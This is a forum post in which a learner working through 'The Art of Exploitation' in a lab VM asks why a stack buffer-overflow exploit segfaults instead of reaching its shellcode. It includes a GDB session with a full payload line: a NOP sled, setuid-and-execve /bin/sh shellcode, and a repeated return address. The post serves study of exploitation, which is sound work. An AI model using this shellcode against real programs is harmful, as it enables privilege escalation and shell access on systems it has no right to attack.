(Not sure if this is a double post, I sent one in a few mins ago but it didn't seem to take)
I've been playing around with Buffer Overflows this week, and I seem to be running into a strange issue. I am going to try my best to explain it.
I've been working with the examples in "The Art of Exploitation" The first one is vuln.c and here is the code:
int main(int argc, char *argv)
I compiled the program with the -fno-stack-protector and the -mpreferred-stack-boundary=2 and I've also made sure ASLR is off (running Ubuntu 12.10 in a vm)
I've been calculating my return address from subtracting about 400 from the ESP value after the buffer has been added onto the stack. I figured this is where the nop sled should be. I have actually gotten it to the point where it will segfault and print out that address that I was throwing at it, but I guess I'm curious why if EIP has that address it's not launching the sled and sliding down to my shellcode? I'm aware of the divisible by 4 rule, and I'm pretty sure I have that in place too..
Here is the GDB session with the info I'm throwing at it:
Starting program: /root/aeh/bof/vulnerableapp `perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`
Breakpoint 1, main (argc=2, argv=0xbffff604) at vul.c:8
8 strcpy(buffer, argv);
Program received signal SIGSEGV, Segmentation fault.
0xbffff18a in ?? ()
Any ideas on how to attack this next? I'd really like to learn this, its rather exciting
Thanks in advance for all your help!